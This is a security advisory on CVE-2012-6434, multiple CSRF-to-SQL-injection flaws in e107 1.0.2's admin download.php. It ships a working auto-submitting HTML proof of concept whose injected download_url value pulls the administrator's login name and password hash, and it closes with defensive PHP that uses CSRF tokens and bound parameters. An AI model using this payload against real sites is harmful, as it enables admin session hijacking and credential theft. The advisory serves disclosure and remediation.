Release date:
Updated on:
Affected Systems:
E107 e107 1.0.2
Description:
--------------------------------------------------------------------------------
Bugtraq id: 57093
CVE (CAN) ID: CVE-2012-6434
e107 is a content management system written in PHP.
e107_admin/download.php in e107 1.0.2 and other versions has multiple CSRF vulnerabilities. Remote attackers can hijack the administrator's authentication for requests that conduct SQL injection attacks via the (1) download_url, (2) download_url_extended, (3) download_author_email, (4) download_author_website, (5) download_image, (6) download_thumb, (7) download_visible, or (8) download_class parameter, and so perform unauthorized database operations.
<* Source: Joshua Renault
Link: http://xforce.iss.net/xforce/xfdb/80902
http://www.exploit-db.com/exploits/23829/
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use them at your own risk!
<html>
<body onload="document.formCSRF.submit();">
<form method="POST" name="formCSRF" action="http://ww.example.com/e107/e107102/e107_admin/download.php?create">
<input type="hidden" name="cat_id" value="1"/>
<input type="hidden" name="download_category" value="2"/>
<input type="hidden" name="download_name" value="adminpassdownload"/>
<input type="hidden" name="download_url" value="test.txt", (select concat (user_loginname, ':', user_password) from e1__user where user_id = '1'), '', '0', '2', '2', '123 ', '','', '2', '0', '', '0', '0') ---"/>
<input type="hidden" name="download_url_external" value=""/>
<input type="hidden" name="download_filesize_external" value=""/>
<input type="hidden" name="download_filesize_unit" value="KB"/>
<input type="hidden" name="download_author" value=""/>
<input type="hidden" name="download_author_email" value=""/>
<input type="hidden" name="download_author_website" value=""/>
<input type="hidden" name="download_description" value=""/>
<input type="hidden" name="download_image" value=""/>
<input type="hidden" name="download_thumb" value=""/>
<input type="hidden" name="download_datestamp" value=""/>
<input type="hidden" name="download_active" value="1"/>
<input type="hidden" name="download_datestamp" value="10% 2F11% 2f2012 + 02% 3A47% 3A47% 3A28"/>
<input type="hidden" name="download_comment" value="1"/>
<input type="hidden" name="download_visible" value="0"/>
<input type="hidden" name="download_class" value="0"/>
<input type="hidden" name="submit_download" value="Submit + Download"/>
</form>
</body>
</html>
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
E107
----
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
http://e107plugins.co.uk/
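
The advisory describes two flaws that chain: the admin form accepts a forged cross-site POST, and the eight listed parameters are injectable into SQL. The following is an added example (not e107's code and not the vendor patch) of a handler that rejects a request lacking the session's anti-CSRF token and binds those parameters in a prepared statement; the `csrf_token` field name, the `e107_download` table name and the use of PDO are assumptions.

```php
<?php
// Added illustration, not e107 code. Assumes session_start() has already run.
declare(strict_types=1);

// The eight parameters the advisory lists as injectable.
const DOWNLOAD_FIELDS = [
    'download_url', 'download_url_extended', 'download_author_email',
    'download_author_website', 'download_image', 'download_thumb',
    'download_visible', 'download_class',
];

/** Issue a per-session token to embed as a hidden field in the admin form. */
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

/** True only when the POST carries the session's token (a forged form cannot know it). */
function csrf_check(array $post): bool
{
    $sent = $post['csrf_token'] ?? '';
    $want = $_SESSION['csrf_token'] ?? '';
    return is_string($sent) && $want !== '' && hash_equals($want, $sent);
}

/** Insert the download row with bound parameters; values never become SQL text. */
function create_download(PDO $db, array $post): bool
{
    if (!csrf_check($post)) {
        http_response_code(403);
        return false;
    }
    $cols  = implode(', ', DOWNLOAD_FIELDS);
    $marks = implode(', ', array_fill(0, count(DOWNLOAD_FIELDS), '?'));
    $vals  = [];
    foreach (DOWNLOAD_FIELDS as $f) {
        $v = $post[$f] ?? '';
        $vals[] = is_string($v) ? $v : '';   // drop array values sent as name[]=
    }
    // 'e107_download' is an assumed table name for this example.
    $stmt = $db->prepare("INSERT INTO e107_download ($cols) VALUES ($marks)");
    return $stmt->execute($vals);
}
```

Either control alone leaves a gap: the token check stops the cross-site trigger but not injection by a logged-in admin account, and parameter binding stops injection but still lets a forged form create records.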